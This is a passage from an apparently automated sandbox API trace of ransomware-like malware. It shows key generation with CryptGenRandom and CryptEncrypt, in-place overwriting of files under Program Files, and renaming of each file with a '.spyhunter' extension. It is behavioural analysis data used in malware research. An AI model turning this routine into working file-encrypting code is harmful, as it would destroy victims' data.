lpNewFilePointer=0x0) returned 1 [0167.251] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x25ce5c4*, lpNumberOfBytesWritten=0x25ce584*=0x4, lpOverlapped=0x0) returned 1 [0167.352] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce584*=0x30, lpOverlapped=0x0) returned 1 [0167.352] CloseHandle (hObject=0xb0) returned 1 [0167.353] GetProcessHeap () returned 0x2c0000 [0167.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.353] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.spyhunter") returned 97 [0167.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.spyhunter")) returned 1 [0167.354] GetProcessHeap () returned 0x2c0000 [0167.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.354] GetProcessHeap () returned 0x2c0000 [0167.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.354] GetProcessHeap () returned 0x2c0000 [0167.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca980 | out: hHeap=0x2c0000) returned 1 [0167.355] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5c8 | out: pbBuffer=0x25ce5c8) returned 1 [0167.355] GetProcessHeap () returned 0x2c0000 [0167.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.355] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5c0*=0x30) returned 1 [0167.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.356] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 71 [0167.356] StrStrW (lpFirst="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpSrch=".txt") returned=".txt" [0167.356] lstrlenW (lpString=".txt") returned 4 [0167.356] lstrlenW (lpString=".txt") returned 4 [0167.356] GetProcessHeap () returned 0x2c0000 [0167.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.356] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.359] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.359] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.360] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.360] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.360] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.360] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.360] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.360] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.361] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.361] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.361] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.361] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.361] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.361] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.361] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.361] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.362] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.362] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.362] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.362] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.362] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.362] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.362] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.362] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.363] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.363] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.363] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.363] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.363] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.363] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.363] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.363] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.364] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.364] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.364] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x2800, lpOverlapped=0x0) returned 1 [0167.364] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce584*=0x8b1, lpOverlapped=0x0) returned 1 [0167.364] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff74f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.364] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8b1, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce584*=0x8b1, lpOverlapped=0x0) returned 1 [0167.364] GetProcessHeap () returned 0x2c0000 [0167.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.364] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.364] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x25ce5c4*, lpNumberOfBytesWritten=0x25ce584*=0x4, lpOverlapped=0x0) returned 1 [0167.365] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce584, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce584*=0x30, lpOverlapped=0x0) returned 1 [0167.365] CloseHandle (hObject=0xb0) returned 1 [0167.365] GetProcessHeap () returned 0x2c0000 [0167.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.365] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.spyhunter") returned 81 [0167.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt.spyhunter")) returned 1 [0167.367] GetProcessHeap () returned 0x2c0000 [0167.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.367] GetProcessHeap () returned 0x2c0000 [0167.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.367] GetProcessHeap () returned 0x2c0000 [0167.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ddb8 | out: hHeap=0x2c0000) returned 1 [0167.367] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5c0 | out: pbBuffer=0x25ce5c0) returned 1 [0167.367] GetProcessHeap () returned 0x2c0000 [0167.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5b8*=0x30) returned 1 [0167.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release" (normalized: "c:\\program files (x86)\\java\\jre7\\release"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.368] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release") returned 44 [0167.368] StrStrW (lpFirst="release", lpSrch=".txt") returned 0x0 [0167.368] GetProcessHeap () returned 0x2c0000 [0167.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.368] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce57c*=0x1fa, lpOverlapped=0x0) returned 1 [0167.370] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.370] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce57c*=0x1fa, lpOverlapped=0x0) returned 1 [0167.370] GetProcessHeap () returned 0x2c0000 [0167.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.370] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.370] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5bc*, lpNumberOfBytesWritten=0x25ce57c*=0x4, lpOverlapped=0x0) returned 1 [0167.370] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce57c*=0x30, lpOverlapped=0x0) returned 1 [0167.370] CloseHandle (hObject=0xb0) returned 1 [0167.371] GetProcessHeap () returned 0x2c0000 [0167.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.371] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.spyhunter") returned 54 [0167.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release" (normalized: "c:\\program files (x86)\\java\\jre7\\release"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\release.spyhunter")) returned 1 [0167.372] GetProcessHeap () returned 0x2c0000 [0167.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.372] GetProcessHeap () returned 0x2c0000 [0167.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.372] GetProcessHeap () returned 0x2c0000 [0167.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33dd20 | out: hHeap=0x2c0000) returned 1 [0167.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5c0 | out: pbBuffer=0x25ce5c0) returned 1 [0167.372] GetProcessHeap () returned 0x2c0000 [0167.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5b8*=0x30) returned 1 [0167.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.373] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt") returned 47 [0167.373] StrStrW (lpFirst="README.txt", lpSrch=".txt") returned=".txt" [0167.373] lstrlenW (lpString=".txt") returned 4 [0167.373] lstrlenW (lpString=".txt") returned 4 [0167.373] GetProcessHeap () returned 0x2c0000 [0167.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.373] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce57c*=0x2f, lpOverlapped=0x0) returned 1 [0167.374] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.374] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce57c*=0x2f, lpOverlapped=0x0) returned 1 [0167.374] GetProcessHeap () returned 0x2c0000 [0167.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.375] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.375] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5bc*, lpNumberOfBytesWritten=0x25ce57c*=0x4, lpOverlapped=0x0) returned 1 [0167.375] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce57c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce57c*=0x30, lpOverlapped=0x0) returned 1 [0167.375] CloseHandle (hObject=0xb0) returned 1 [0167.375] GetProcessHeap () returned 0x2c0000 [0167.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.375] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.spyhunter") returned 57 [0167.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt.spyhunter")) returned 1 [0167.376] GetProcessHeap () returned 0x2c0000 [0167.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.376] GetProcessHeap () returned 0x2c0000 [0167.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.376] GetProcessHeap () returned 0x2c0000 [0167.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33dc78 | out: hHeap=0x2c0000) returned 1 [0167.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5b8 | out: pbBuffer=0x25ce5b8) returned 1 [0167.377] GetProcessHeap () returned 0x2c0000 [0167.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5b0*=0x30) returned 1 [0167.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE" (normalized: "c:\\program files (x86)\\java\\jre7\\license"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.378] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE") returned 44 [0167.378] StrStrW (lpFirst="LICENSE", lpSrch=".txt") returned 0x0 [0167.378] GetProcessHeap () returned 0x2c0000 [0167.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.378] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce574*=0x29, lpOverlapped=0x0) returned 1 [0167.379] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.379] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x25ce574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce574*=0x29, lpOverlapped=0x0) returned 1 [0167.379] GetProcessHeap () returned 0x2c0000 [0167.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.379] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.379] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce574, lpOverlapped=0x0 | out: lpBuffer=0x25ce5b4*, lpNumberOfBytesWritten=0x25ce574*=0x4, lpOverlapped=0x0) returned 1 [0167.379] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce574, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce574*=0x30, lpOverlapped=0x0) returned 1 [0167.379] CloseHandle (hObject=0xb0) returned 1 [0167.379] GetProcessHeap () returned 0x2c0000 [0167.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.380] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.spyhunter") returned 54 [0167.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE" (normalized: "c:\\program files (x86)\\java\\jre7\\license"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\license.spyhunter")) returned 1 [0167.380] GetProcessHeap () returned 0x2c0000 [0167.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.381] GetProcessHeap () returned 0x2c0000 [0167.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 